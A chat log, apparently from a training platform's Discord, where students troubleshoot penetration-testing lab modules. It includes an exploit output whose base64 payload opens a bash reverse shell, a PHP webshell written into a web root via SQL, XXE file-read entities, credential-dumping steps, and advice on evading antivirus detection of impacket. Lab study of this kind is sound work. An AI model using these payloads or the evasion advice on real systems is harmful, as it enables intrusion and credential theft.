#modules

You generally have to do -Pn or some other thing so it works right

I tried with -Pn and -n and -sT. No luck.

can any one help me

unable to build ptuller-ng with autogen.sh

I was able to get proxychains nmap working when running in a root shell (a real shell, not just sudo):

kali@kali:~$ sudo -i                 
root@kali:~# proxychains nmap -sT 172.16.5.1-100 -n -p3389 --open 2> /dev/null

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-06 13:21 PDT
Nmap scan report for 172.16.5.19
Host is up (0.020s latency).

PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

Nmap done: 100 IP addresses (100 hosts up) scanned in 364.58 seconds

root@kali:~# proxychains nmap -sT 172.16.5.19 -n -p3389 --script *rdp* 2>/dev/null

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-06 13:29 PDT
Nmap scan report for 172.16.5.19
Host is up (0.020s latency).

PORT     STATE SERVICE
3389/tcp open  ms-wbt-server
| rdp-ntlm-info: 
|   Target_Name: INLANEFREIGHT
|   NetBIOS_Domain_Name: INLANEFREIGHT
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: inlanefreight.local
|   DNS_Computer_Name: DC01.inlanefreight.local
|   DNS_Tree_Name: inlanefreight.local
|   Product_Version: 10.0.17763
|_  System_Time: 2024-06-06T20:30:03+00:00
| rdp-enum-encryption: 
|   Security layer
|     CredSSP (NLA): SUCCESS
|     CredSSP with Early User Auth: SUCCESS
|     RDSTLS: SUCCESS
|     SSL: SUCCESS
|_  RDP Protocol Version:  RDP 10.6 server

Nmap done: 1 IP address (1 host up) scanned in 9.85 seconds

It takes quite a while to run, but at least it kind of works.

Module: AD Enum Att Skills Assess II.

Anyone recall splitting any files for transferring tools outside of a 'cert'ain tool? Just looking for confirmation. Thanks! If not, I'm curious either way.

Didn't use anything like that

The writeup uses it, it's just one of many tools

Apply the concepts taught in this section to obtain the password to the Vendor user account on the target. Submit the clear-text password as the answer. (Format: Case sensitive) Attacking LSASS

I tried everything anyhelp 😦

Could be that your lsass is corrupted, I'd rm all the lsass files and transfer again

Also you don't need to be root

i dont know if this is the reason or not but on the section there peocess has three files or sub processes but when i rdp to create dump file for the lsass i see only two

This is in the lesson , Does it matter ?

¯_(ツ)_/¯

Does anyone else take a huge amount of notes and rely on repetition in terms of popping boxes to learn/remember things?

Definitely, taking notes is important.

And in terms of repetition with just doing the thing... Popping boxes... That's more helpful than just re-reading the course content right?

For the CPTS I mean.

I mean you can take your own notes from the modules and format them in such a way that works best for you

If you complete the module, you retain access to it afterwards (if done during a subscription), so can always refer back, but always useful to take your own notes as you go, as it's good practice for when you start to go up against either the HTB Labs, or against the Exams

Right, okay.

I just feel a bit insecure because I'm not remembering everything. But yeah I'll get through it.

Any module you buy is yours forever :D

I barely remember half the things aside from the common tools I use, nmap, xfreerdp

And ssh

a good portion of other stuff is just notes ¯_(ツ)_/¯

^

Good to know. Thanks Marcie.

Yeah, I meant the modules you unlock if you have a subscription like annual. Those you complete, you keep access to after the sub ends

ohhhh ye

If you unlock with cubes, then yes you keep them

if you complete the CPTS path under an annual sub you keep all the modules

yup

The proxychains was setup fine, I could scan the target host with proxychains Nmap. The issue was the RDP connection would die almost immiedately. I had a chat to support and used a tip from Ryuki about a timeout. Once I set a timeout to 10000ms and network connection to Broadband, I could RDP properly

It doesn't matter
There might be higher chances of that type of file in real world.

marcie speaks the truth, creating your own documentation is absolutely critical imo

what trees?

you ran the same prebuilt query?

servers seem kinda borked right now

i'm having big problems on US servers, EU seems better but still isn't working

that should return extended edges too iirc, but it's been a while since I've used the legacy version

which module

me or siffer?

Module: Cross Site Scripting > Discovery

I am trying to install the dependencies for XSStrike and I am having difficulty installing fuzzywuzzy. When using pip install python-m pip install python3-m pip install with and without sudo as well as apt-get and even downloading the git itself to try and manually install it. Every attempt to install is failing. Using commands to install and the installation process appears to hang. While manually installing it seems to fail to compile. Any advice?

I am not using the pwnbox, I am using Kali

you

Windows attacks & defense

wait for like 5 mins

HTB AD Skill Assessment 2
Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host

I got an user * * * * *svc and a clear password, but i can't do anything with it. Tried evil-winrm in the host and didn't word. Any ideas?

tried us and eu

US couldn't even remote in after 10 mins, EU let me in once, but the box got that trust error like it disconnected from the domain.

welp bad time to be doing modules I guess

but that module has been pretty slow to begin with

I'm stuck on AD Enumeration & Attacks - Skills Assessment Part I question 4. I managed to kerberoast the user in Q3 and can get a reverse shell on the pivot host but can't seem to get any further. All of the users that I try seem to not have permissions to do anything on AD. I can get Ligolo-ng running on the pivot and get to the DC but can't seem to find anything of interest on that. The webshell and reverse shell on the pivot are running as local admin but I still can't seem to get to the domain. Can anyone give me some pointers?

check what services that account can access, the name should be a pretty big hint

@cloud urchin could you raise a ticket with support stating what you're experiencing? I'm afraid there is reduced support capacity outside of core EU time zone, but at least someone will be able to pick it up tomorrow and do some testing / checking. Apologies for the inconvenience caused 😦

It's been going on the past few weeks

Someone mentioned they opened a ticket for this and they said they were aware and working on it

I'll pass the image you provided on to the academy module team internally also

i posted another one above, it did let me connect one time but got kicked shortly after. box is having domain trust issues with the DC.

it seems to really be affecting any module that also contains an internal vlan with more hosts

check for access with the accounts that you have

yeah has been a thing for at least the past week, at least for the US servers

Understood

its ok i still love htb

Would you say from maybe mid may?

or more recently

I think it's been happening for several weeks now, I recall people begin to complain here about the EU region, we advised to go to US and it fixed it, and now it seems to be the reverse, EU appears up most of the time, however right now I'm having issues with both.

I'm opening a ticket and writing all this in there too

Ok

Thank you

I'm having issues with Attacking Common Apps Skill Assessment 1.

It says the payload was sent, but no session was created.

I tried it about 20 times.

I ended up following the guide step-by-step, so I don't believe it's user error.

whew, respawning the box 3 times got me a different IP, it seems to be letting me connect (US region)

Could you pass me the IP in DM please?

Curious whether there's an issue with a particular node there

So, i got this credential and another local admin hash from SQL01 host, using xp_cmdshell. Tried another enumerations on that host and got nothing. Now i did RDP into MS01 using * * * * *svc user, but when i try to transfer mimikatz to the host, the connection drops. Right now i'm really roasted with this question

have you checked the rights of that user in ms01?

What is the function of & in nc?

nc -nvlp 9001 &

[+] Extract login nsp token : 9334348aa282e0f96e03acb637b7da8dc52faef73e84cc6a7e6976044fe7a0c1
[+] Login ... Success!
[+] Request upload form ...
[+] Extract upload nsp token : b28f8c661b0a8c023efbb776121c8269bf4113ee3e7cfb6786f8f547e5016986
[+] Base64 encoded payload : ;echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMjkuMjAxLjkwLzkwMDEgMD4mMQ== | base64 -d | bash;#
[+] Sending payload ...
[+] Check your nc ...

[1] + done python3 49422.py http://monitoring.inlanefreight.local nagiosadmin 9001

nc isn't catching the shell. nc isn't doing anything.

Thank you gubarz

If you have time, may I dm you with where Im at? I just verified anything over 1.4K doesnt write to stream

I'm just going to plug in the answer since I doubt this is on the test. But I've got to be honest, the fact that I'm following your guide and it still isn't working is encouraging me to skip around and guess at everything.

How am I supposed to know whether or not I'm doing things correctly when your platform is busted even when I follow your guide?

The purpose of the & symbol is explained in a previous module

Alright well, when I use it nc closes.

I say this with the utmost respect, the CPTS is really awesome but your platform has been messed up lately.

People's time is very valuable, and if your platform isn't responding the way your guide says it should...this provides an awful lot of confusion.

Im using nc bg'd as we speak, make sure its still running however. Sometimes it'll stop

Yeah.

I dunno, you guys are still better than OffSec. But I hope that the CWEE doesn't require me to restart a VM 50 times.

I'm literally plugging in answers and taking notes because things aren't working.

I'm sorry to hear that - we do accept feedback with the /feedback command, or through our support staff via https://help.hackthebox.com. I'd love to stay up and help, but it's now 4AM again, so I need to get a bit of sleep

It's hard enough to get this stuff right when the platform is dependable.

I'm not taking any more time to give feedback. I've given you my money and again, you're better than OffSec.

It's just how it is.

I'm moving on to Linux Privilege Escalation, if I can't get a shell to pop in there...lol

I would definitely say HTB infra is at least 10x better than Offsec lol

I give them that.

Their content is amazing and I've learned a TON.

But when I go to study if the platform is down, that's my TIME and my EFFORT being wasted.

UriEl what's your completion %? (Im 99.56%)

All I have left is Privilege Escalation Linux/Windows and Attacking Enterprise Applications.

And again I have every intention of moving on to the CWEE.

It's just really sad when I can't trust the platform to tell me when I'm screwing up. That's a BIG problem.

Maybe that module just sucks...Linux Priv Esc is working.

But yeah, I tried to be respectful. I love HTB and the CPTS 🙂

Very good value etc...

Mind dming me?

This really isnt the spot for feedback as other users are equally working on the same path

Maybe a feedback channel would be a good idea.

But yeah I'm done complaining, I am sure I was doing things correctly. The platform is just messed up at the moment.

The real scary thing is what if the test glitches on me?

That is what I'm most afraid of, and I hope that that area of the platform is dependable.

If anything I used a post request back to one of my http servers

See above

password attacks > attacking active directory & NTDS.dit

Capture the NTDS.dit file and dump the hashes. Use the techniques taught in this section to crack Jennifer Stapleton's password. Submit her clear-text password as the answer. (Format: Case-Sensitive)
It should show the hashes right?
when running the crackmapexec smb {IP} -u jmarston -p {pass} --ntds. but for mine, it does not prompt anything

Hi guys!! i've just finish my ADenum&att module, the question 4 of assessment 2 need me to figure it out one credential, after struggle to find the cred i try to use the same password at password spraying section and get a cred. I doubt that i use the right way so i have double check with the walkthrough and the password just come up to password spraying without any specific way to find it, Am i missing something or that 's the real scenario out there that we just guess the password. Sorry if this question bother you i have no experience in this field so i really curious about this

the --ntds for CME is DCSync, to dump the local NTDS.dit file, you'll need to get a shell on target

spray with the common passwords mentioned in the module

Just looked at your screen shot, sorry thought you were trying to go the other way. Yeah if you're still around you can dm

Still needing assistance with this if anyone has an ideas.

What's the error message when you pip install?

I receive an error about a directory being inaccessible and its defaulting to the home directory. Then it freezes up, no further output and no apparent activity.

If I run it with sudo, I don't get the error regarding the directory, but it still freezes up

Does it do it with other packages?

I only have one account so far, or am I re-using the accounts that I found in the exercises?

Hi, I am doing Skills Assessment of the Pivoting module. I got access to the first pivot Windows server 172.16.x.x. From there, I needed to find second pivot. I did ping sweep but it returned false.

No, the rest of the module will have no bearing on the assessment. You have an account, check for where else you can use that account.

I checked the forums after nothing worked and it revealed one machine to which when I ping, gives response.

The Test-Connection command is also returning True right now

But when I was trying within loop earlier, it had returned False

Why? 😦

How am I supposed to know if similar things happen during exam?

The various paths (https://academy.hackthebox.com/paths/jobrole) map to the certifications

yes, with everything using pip it freezes

You should have something return, what command did you run for the for loop? You can wrap it in spoiler tags or DM the command.

||1..254 | % {"172.16.6.$($_): $(Test-Connection -count 1 -comp 172.16.6.$($_) -quiet)"}||

You can try removing it from your home directory? Or try this? /usr/bin/python3 -m pip install fuzzywuzzy

I'll try this and get back to you

Mind if I dm you?

Sure

That one seemed to work, thank you very much

the one that you found for that assessment

I have executed the same command again, and this time, it gives me true for the same IP address where it had returned False. Can anyone explain why this happened? @shut quest suggested that this might have happened because ICMP requests are unreliable and the server might not have reponded. So, what are my alternatives to make this request reliable?

There's multiple issues that could make this unreliable. Your best bet is simply upping your count, if you want to rely on ICMP alone. Another option would be to test common ports, instead of just using ping, in order to identify devices. You could sweep the subnet for port 22, to try to find linux hosts, for instance. 445/139 for windows.

Thanks for the input.

That is why I suggested nmap over a ping sweep, a top 20 should provide a high hit chance without taking much time.

nmap to port 22?

if you're doing the ping sweep from a windows machine , i would recommend this Get-Pingsweep.ps1 powershell script

https://gist.githubusercontent.com/joegasper/93ff8ae44fa8712747d85aa92c2b4c78/raw/ba84c297a051833e0b48b3cb31bfbaa8d7fec35f/Get-PingSweep.ps1

--top-ports 20 or if you just want what rat said -p 22,139,445

and nmap can already internally handle doing full subnets, so you don't have to make any special loops or anything

for this we need more than one ping

first ping might not get a response , because the target will ARP broadcast

and ask who you are

Or might even be blocking ICMP.

yes, also very common

Now that I check the module again, this is actually written there as well.

That is a fancy script , I like my one liners, but I'll keep this.

just use nxc

usually if the windows host is live smb will be running

HTTPS/TLS ATTACKS
Heartbleed Bug

How long did you have to try? I've been trying for an hour to get the result 😅

Hi guys,
I have a question about "Documentation & Reporting" module.
I couldn't open the zip files containing the obsidian notebook and the report
Can anyone check if the files are good ?

working fine here

You can open it as this:

Thanks but not working for the sample report pdf and docx

working fine here

the zip is password protected

just downloaded it, works fine here

👍🏿

can any one help me
unable to build ptuller-ng with autogen.sh

Check if this can help, otherwise payloadbunny posted the compiled versions one message above
#modules message

bruh

How long ago did you spawn it?

15mins

i respawned it now and got it

Ok, thanks

Do you have a link to the module / section please?

and VPN name

https://academy.hackthebox.com/module/176/section/1791

eu academy 5

Thanks

will the certificate generated change everytime?

i used certificate from a previous time and it seems to give error on rubeus

nvm it works fine now

I,m stuck in nosql injection skill assessment 2,
i'm trying to test the nosqli payloads like $regex etc... when content-type: x-www-form-urlencoded, failed

i'm trying SSJI payloads also. failed as well.

I tried in /login, /forgot and /reset url. all failed. what to do now ?

I also tried with change the content-type to json and pass an json data in the req body, the response said missing that_parameter ...

Try to find a field where you receive a response after you have submitted the form. Take a close look at the answer. Change the input and look at the answer again

i only find the /forgot giving an response "the pass reset link has ben sent" when pass the username [got from placeholder]

then stuck

Hey has anyone done the file upload attacks module?

DM

There are other forms with feedback

hi menace bunny

see your messege box

ou really ? let me get that

I did'nt get that . where did u found

You have listed three forms. Which of them give you feedback when you enter something?

/forgot

For which form field could you find data that is fairly certain to be correct?

Not only

Module: Attacking Common Services - Easy

You are targeting the inlanefreight.htb domain. Assess the target server and obtain the contents of the flag.txt file. Submit it as the answer.
I've gotten access to the database and ran the following command:
||```
SELECT '<?php system($_REQUEST["cmd"]); ?>' INTO OUTFILE 'C:\xampp\htdocs\shell.php';

I then started a listener on my attack host on port `1234`.
I then visited this URL in the browser `http://10.129.37.231/shell.php?cmd=` and inserted my payload after that. I didn't get a reverse shell. I ensured to use a Windows payload and even URL encoded it.
Also, if I try visiting the URL with the `whoami` command as a parameter, it doesn't give me an output. I get what's shown in the screenshot instead.

change the quotation marks.
Use “ for SQL
Use ' for PHP

Changed it like you suggested but still doesn't seem to work 😕

There is one other option apart from System($_Request . Try it with this

Hello everyone, help me complete this module. Plizz

https://academy.hackthebox.com/module/134/section/1206

where you stack at?

Still doesn't work.

in footprinting medium lab, i mounted the nfs share with this command " sudo mount -t nfs 10.129.202.41:/ ./target-nfs/ -o nolock", the nfsshare got mounted but i got an error "Permission denied" when traversing it.. with "ls -n" i got this uid "65534", when i was creating it the user with that uid, it already existed with a username "nobody", and i can't even select that user, it says "account currently not available", also i can't delete that user to create it back!!

Don‘t use System($_RequestUse something different

$_GET

sudo is not the same as root

meaning

The section actually uses this command:

SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';

But I'm not sure how to access this webshell and make it run my command since it uses $_GET. Do you know how?

You have to run it as root, not as a user with sudo rights

Exactly the same as with the System

i see, thanks

Ahhh okay, I'll try it out, thanks.

?c=<command>

can you give me an example command

The exact same command (without sudo), but you must be root. It's about the UserID. It must be the same. Root = 0

Module: ATTACKING ENTERPRISE NETWORKS
Topic: Lateral Movement
Question: Obtain the NTLMv2 password hash for the mpalledorous user and crack it to reveal the cleartext value. Submit the user's password as your answer.

I have the hash but hashcat is giving me a token length exception. I can see it's clearly bigger than the hashes on the hashcat example but not entirely sure how to cut it down?

UPDATE: If anyone reads this in the future, if you are getting the token exception length it can be down to an encoding issue. Just do dos2unix to conver the file from UTF-16LE to UTF-8 and it should function fine. You will also see the difference in file size once this is done, it will go from a file of around 1.7kb to 7-800b.

i see

Still didn't work.

Adding to what the Buddy said, NFS is file based permissions, meaning there is no server side check. So long as your UID/GID matches the permissions, you will ahave free range.

thanks

Then try to change \ to / like c:/blahblah

This finally worked. Thanks

And if forward slashes don't work, escape your backslash c:\\

I should've left the command the same 🤦‍♂️

The forward slashes worked, thanks for your suggestion.

without sudo it gives error "mount.nfs: failed to apply fstab options"

i am using the same mount command without sudo

with root, not with your user

😩

su root

thanks

Anyone give me a nudge with this hash formatting issue?

well, hachthebox pwnbox doesn't have root permission, meaning it asks for password, i did the same without root in nfs section in footprinting, it worked without any issue, the problem only occurs in footprinting medium lab, maybe i am not allowed in there, and the flag is somewhere else??

Creds are on the Desktop

cheat and do sudo su but there's creds to the box on the desktop

oooo, thanks

I cannot repeat what is written even in the module examples.

Use either method from this section to read the flag at '/flag.php'. (You may use the CDATA method at '/index.php', or the error-based method at '/error').

only these commands are received

<!ENTER your email address [
<!ENTITY corporate SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>

<!Email with the document type [
<!THE ESSENCE OF THE corporate SYSTEM "file:///etc/passwd">
]>

I'm losing my mind trying to figure out the issue with this inveigh ntlmv2 hash. I have ran inveigh multiple times and still get the same hash, but unsure how to crack?

Okay , so I am working on the only question of this section module(https://academy.hackthebox.com/module/33/section/183):

"Connect to the database using the MySQL client from the command line. Use the 'show databases;' command to list databases in the DBMS. What is the name of the first database? "

I typed the command '||mysql -u root -h 94.237.54.176 -P 52537 -p||' and once I was in the database, I type showtases and submitted the first database in the 'Database table'

I removed white spaces and when I submitted my answer, it still wasn't accepted.

Never mind. Forwhatever reason, HTB now decided my answer was acceptable(despite not changing anything)

Wasn't really sure where to ask this question so I decided to ask here. I've configured my tmux to use vi keybinds for copy-mode. I understand how to highlight text in the terminal now but when I copy using Enter after selecting the text, it copies the text only to the buffer of copy mode, how do I copy to system clipboard?

Hopefully that makes sense 😅

are you using x11 or wayland?

x11

should already be in the clipboard

wait are you in a vim session too?

as in 1 window vim 1 window terminal etc

Maybe I'm not using x11 then? 💀
I'm just running a basic installation of kali.

No, I'm not in vim. I've launched tmux, entered a bunch of commands and then entered copy-mode. I've highlighted text and when I use the keybind Enter to copy the selected text and exit copy-mode, it doesn't copy it to clipboard.

If you are running basic installation it still uses x11

Alrighty

Say I copy something like this and click Enter, it doesn't copy to clipboard.

are you using the tmux plugin manager or something else?

Nothing, this is a fresh install of Kali.

My conf file.

another questions do you mean to the global clipboard or just kali's?

as in is this in a vm and you want it in global clipboard?

Just Kali.

I've already configured my VM to be bidirectional, so it should copy to both either ways, at least that's been the behaviour for everything else.

Just can't get text from copy-mode to the Kali's clipboard for some reason.

take a look at this
https://github.com/tmux/tmux/wiki/Clipboard

Alrighty, thanks.

plugin manager is also good if you get a chance

Noted

I tried the set-clipboard doesn't work, gonna give the other method a shot.

Any particular plugin you'd suggest?

at work at the moment but you can see my config here https://github.com/mdb-dev-io/mydotfiles/blob/main/dotfiles/config/tmux/README.org

Pluggins are near the bottom

You'll need to get the plugin manager too

I tried the other method from the official docs and still didn't work 😕

have you rebooted your vm since making the changes

I've gotta reboot...? I thought if I killed the tmux session it'd be enough.

The first method didn't actually require me to make any changes to my configuration which I found to be quite odd.

The second method involved me only adding one line to the conf file.

mate, I am trying to help. Fundamental rule of troubleshooting "if in doubt reboot"

Alrighty, I'll give it a go rn.

Has anyone encountered the issue with inveigh where hashcat has the token length exception with the hash? I've seen thishttps://github.com/Kevin-Robertson/Inveigh/issues/24 and tried adding the challenge but can't get it to work

It's in refernce to Module: ATTACKING ENTERPRISE NETWORKS
Topic: Lateral Movement
Question: Obtain the NTLMv2 password hash for the mpalledorous user and crack it to reveal the cleartext value. Submit the user's password as your answer.

my computer is on fire do i just restart?

That's not troubleshooting, that's negligence

my computer has now summoned demons do i force a shutdown?

no, shout "Hail Satan"

it is now floating you lied to me

You have to cast it to a signed int so it'll behave. This is basic daemonology come on!

UNSIGNED INT 💩!!! Please tell me you didn't cast it to a signed int. Oh no...

Oh C, Lord of Chaos. Pitty us mere mortals.

Guys does HTB Monthly Gold subscription to the accademy cover TIER III ?

hi, I need a small nudge for the Hard skill assessment in the Abusing HTTP Misconfigurations module. Can I please dm someone?

Hi, I have a problem with enrolling in the academy. Exactly 1 month ago I bought the student plan on HTB and I didn't want to renew the plan this month (it expired on June 3rd). Despite this, however, I can still see the modules that I have never done and I still get the "Student" rank, I don't think this is normal, right?

Can someone redirect me to official or perhaps specific support for this type of problem?

i would have said nun and keep the free stuff XD

If you purchase them with cubes I think they’re always yours

hahaha clearly I think it's illegal and I don't want to be charged

I still have student rank and can see modules I've never even seen. For the rest, yes, the ones I have already completed are clearly mine now

if they dont know it never happened 😂

but too late for u, u can contact support

its the green box on bottom right corner in academy

where can I contact him?

I have no button to bottom right corner in academ

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

Ok I will test this thx

np

Do you mean does it give full access? No

Only gold annual gives access to t3 modules, gold monthly just gives cubes

Hey, thanks for the hint. Just got the flag. Tyvm 🙂

Thank you! 🙂
Looking at doing the CREST CPSA/CRT pathway 🙂

¯_(ツ)_/¯

Idk what that full path cost (including the cube refund) looks like

T1+ modules give back 20% of spent cubes as/when you complete

7290 cubes in total

¯_(ツ)_/¯

I'm not in EU so I never dove much into it

Can earn 1580 cubes from it I think

In total doesn't include the 20% from t1-3 modules within

Any t0 gives 100%

Probably better worth going for like 6-7 months of plat

Which gives 1k Cubes per month, and you'll likely spend enough time that you won't wait too long for the next cube deposit

Looks like further down on the list some of the modules cost 500 cubes

I'll do the 10 cube ones to start with as I got 60 cubes I can use now

then I'll prob get gold sub

Can only really dedicate an hour a night to it unfortunatly

But its better than reading books, I learn by doing... lol

Yeah then doing a few monthly subs to rack up the cubes is best

Thanks Marcie 🙂

1 hour at a time though, you'll be done in 3 years

Ah give or take, may be a bit of extra time here and there, just how much I can push myself and fit it in

Hello this gonna sound so stupid but I am really lost in 3rd question in this module https://academy.hackthebox.com/module/147/section/1638 I tried like everything I can but nothing works for me, even checked the people trying to give tips but still I cant get it. If anyone has patience to tell me how to access shared folder for david, I would be happy, else I am going to sleep in front of my laptop whole time

@icy marsh I deleted your post because it almost shows the complete solution.
Have another look at the Blind data extraction section. You have made a mistake in the logic

You pth

As shown in the section

It may not reflect when you do whoami but you should be able to access the \\DC01\david\ share

so, after using mimikatz I should be able to see contents of shared folder?

The full filepath is \\DC01\david\david.txt

I really get confused, bc I remember like I tried it

Yes

alright I will do it again, thanks for help

If all else fails switch to EU vpn, as US seems to act up with some things

Note the hash passing method opens a whole new cmd/powershell session

omg, rn I feel so dumb... instead of writing \DC01\david, I was writing //DC01/david 💀

Guys could I a sanity check please? 😄 I was just doing the BROKEN AUTHENTICATION Skills Assessment on Bug Bounty Hunter. I was deep into it and just finished crafting my attack. Went to launch my attack but the box had timed out. No panic so I clicked it to open fresh. However, now it's a completely different app/webpage. This one says "It's time to use bot in your server", the other one was like a very simple site with ability to send messages and log in/signup, a bit of a blog.

can someone review my aen report and give tips and pointers to make it better ik i did alot of mistakes that im not aware of 🙏

Report for?

for AEN as in a pentest report

Send it over

I'm so confused right now did HTB change the modules around or something because I was trying to find the flag and I can't even find the exercise

now it says I complete the section I was almost done with I was this close 👌

Some modules got batch updated

Something weird just happened to me. The assessment box timed out and when I opened it again, it was another app 😄

Thanks for letting us know 😄

ok thank you I thought I was losing my sanity

I was just chatting with Jared the other day. For big updates they prefer to bulk change, especially if they're updating walk-throughs as well. As some were fairly outdated

https://tenor.com/HKaGQslZha.gif

Hi, did someone having problems to unlock a module using cubes?

Deactivate all AdBlockers

for the "interacting with users" section in windows privilege escalation, ive placed a .scf file in the Private\IT directory as well as C:\ and C:\Windows, since the hint mentioned shares that the current user can write to, but i still haven't received a hash for the sccm_svc user, am i doing something wrong

nvm

Please do not publish any solutions

anybody also work with the own kali and has big problems witht the vpn?

Lemme guess no network connectivity when using the vpn?
Network manager-->tun0 adapter-->only use resources on its network

no, i have connectivity. it laggs just very awful

Like regular internet connectivity or connection to boxes

If so, just try changing vpn regions and seeing if that fixes

i have already changed.... same problem. regular internet works fine. just the ping to the boxes is slow, and the windows machines which i conenct to crashes all the time

Reach out to support then

i just use the provided box...

Idk

ah i know why. i had already a pwn box open from htb, and he boxes to receive the same ip

Ah, yeah, that'll do it

my own kali machine and the box do receive the same ip

Yeah that's how the vpn works

In regards to the tun0 ip

I didn't know that the instance and my own Kali machine get the same ip. One is in the cloud and with the other I set up a vpn. but ok again something learned

They both use the same vpn pack to connect

aaah

Its why when troubleshooting many others tell you to turn off one when testing the other

The only time it doesnt matter, is for the docker containers

public_ip:port

The logout button for the dashboard is not working...just fyi

Since you don't need the vpn to attack/access

Message support then ig

thx @fathom pendant

Or /feedback

when impacket smb gets blocked by av, how could we evase it?

Smbclient? Or smbserver?

The simple thing is that windows sometimes doesn't like unauthenticated access

So you'd need to set a user/pass to access (if you're launching an smb server)

Also it wouldn't be AV, it'd be firewall

Or some GPO

How does one enumerate well and leave no stones unturned?

i've setup a smb file server and tried to copy a file from my windows to my kali, norton antivirus has instantly blocked it with the message: Fake SMB Server Response blocked

likely bc it isn't set up with credentialed access ¯_(ツ)_/¯

And Norton has a firewall

So again, not necessarily AV

Throw everything at it

question remains the same, how to get around it

Also, depending on your hypervisor you can just... transfer files

yes logical, but i would be interested to know how norton could be tricked 😉

Virtualbox has a file manager you can use to transfer files

Set up your smb server with credentials

As im saying a lot of it deals with there being no credentials

Or go into Norton and allow the connection

¯_(ツ)_/¯

haha, no that would be cheating

Brother, you're asking for ways around it. I'm telling you ways around it

alright sister

Since you trust this connection, allowing it is perfectly fine

And you can remove that White-list after

Otherwise google or #homelab-sysadm would be your best bet, not here

and i'm telling you that i'm more looking for a technical hack solution not just turning off norton 😉

but never mind

🙄

Well then set up your smb server with credentials and see if that works

i will

And I didn't say "turn off norton"

I said "allow the connection"

As in White-list it

yes also not happy with allow or white list 😉

¯_(ツ)_/¯

¯_(ツ)_/¯

Then google it since it's out of scope for academy modules

Yes, sometimes it's necessary to be more curious than just working through the modules 😉 I'll google it

Find a way to transfer files through SMB in a way that does not trigger your antivirus. Maybe try Samba, or just windows to windows SMB transfers. Capture the packets and study what the traffic looks like when its allowed. Then, do the same thing but with impacket-smbserver. There are dozens of labs in Academy where this is possible. Again, capture the packets and see what the traffic looks like when using impacket as the smbserver. I suspect there is some string, or pattern of bytes, that signifies that its impacket (im not super familiar with the specifics of smb) . Then search through the source code and associated libraries used by the impacket smbserver, and remove/obfuscate what you suspect might be causing it to be identified.

Anyone ever work on a module and then it gets updated while you're doing it? I felt like I was going insane when I opened up the module and didn't recognize anything all of a sudden lol

Lmao that's a mood

Yeah it was a very confusing experience lol

Here, i found a video demonstrating how Suricata detects impacket smb connections. Norton probably does something similar to determine what a "legitimate" smb connection looks like
https://www.youtube.com/watch?v=65oJWoqXeRo

but this channel is for discussing Academy content

Hey i'm stuck on the preignition machine. I'm a beginner so i'm sorry for my questions, but i try btw if anyone can help me. When i use gobuster i've this message and i can't find a solution. PLZ HELP
gobuster dir -w /usr/share/wordlists/dirb/common.txt -u 10.129.177.45
Error: error on parsing arguments: wordlist file "/usr/share/wordlists/dirb/common.txt" does not exist: stat /usr/share/wordlists/dirb/common.txt: no such file or directory

wrong channel bud, this is for HTB Academy modules. You'll have to verify your account to access the other channels.

so sorry !!

what does the error mean? In your opinion?

i think because i have any access to the wordlists i try to check it by the command : locate wordlists or gobuster dir -w /usr/share/wordlists/ -u 10.129.177.45

you are telling gobuster to use a wordlist, /usr/share/wordlists/dirb/common.txt

the error is telling you that the file does not exist.

Can you think of a way to confirm or deny that?

i try this but i'm not sure ls /usr/share/wordlists/dirb/common.txt
ls: cannot access '/usr/share/wordlists/dirb/common.txt': No such file or directory

okay

so why not check whats inside /usr/share/wordlists/dirb ?

same answer No such file or directory (If it's bothersome to discuss this here, I can ask my question on another channel. Thanks again for the help)

Good Morning! Good Evening!
I am doing the Active Subdomain Enumeration module and have a question
Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer.

For this question, I ran the command "dig axfr inlanefreight.htb @x.x.x.x" amd got some DNS records
but how can I know the number of zones?

the fact that your command just returned DNS records, indicates you found the first zone

so what I need to do, is get all the domains from the records, and do "dig axfr" against each of them?

it works like
dig axfr <name of subdomain / potential zone> @<IP of DNS Server>

if I get dns records from any of the domains, that means there is another zone

so the target machine for the section is the DNS server . We will always keep @10.129.x.z in our dig commands

possibly. Dig axfr is requesting a zone transfer , and yours just worked

for inlanefreight.htb

so inlanefreight.htb is the first zone

so all of those subdomains that were revealed, after you did the first zone transfer. Try doing a zone transfer against those subdomains.

Thank you @west canopy
I kind of understand it now

i.e

dig axfr dev.inlanefreight.htb @10.129.74.20```

whichever subdomains you found from the first zone

very clear guide

think of a DNS zone like a config file for the DNS server

when we do a zone transfer, we are asking for a copy of the dns servers zone file

if you wanna be extra fancy with it; since you see ns.inlanefreight.htb as the NameServer (NS) record you can add the ip ns.inlanefreight.htb to your /etc/hosts and do

#/etc/hosts
10.129.10.10 ns.inlanefreight.htb

#Command Line/Terminal
dig axfr app.inlanefreight.htb @ns.inlanefreight.htb

thats only if you want your body to ooze pure leetsauce

so sign me up

also as a general note whenever you see 127.0.0.1 on a DNS record, that means the related record (NS, A, MX...) is localhost to the DNS

so if you find a bunch of records all 127.0.0.1 on DNS you can safely add those to your /etc/hosts and the server should autoroute you to the appropriate related site

speaking of @west canopy i find it kinda sad that DNS isn't more prevalent for the Footprinting Easy lab... but at the same time if you did a proper scan it doesn't matter

well we wanted to be sympathetic to the large number of IT professionals who have PTSD regarding DNS in general

so keep the DNS enumeration to a minimum

yeah i keep getting surprised by the people that do the dns enumeration part of that lab

i just skipped it

gonna sign off for a bit , happy hacking everyone 🙂

The above server employs Client-Side, Blacklist, Whitelist, Content-Type, and MIME-Type filters to ensure the uploaded file is an image. Try to combine all of the attacks you learned so far to bypass these filters and upload a PHP file and read the flag at "/flag.txt" Could someone help me on how to solve this? I've tried fuzzing with all the wordlists didn't get anything to work with.

File upload attacks type filters

@west canopy @fathom pendant thanks
Not sure why I cannot add reactions to messages

probably a restriction due to not being verified ( #welcome )

Oh, I didn't know that

yeah HTB locks down unverified users, to reduce spamming of newcomers and whatnot

Thanks, will do verification when I back home

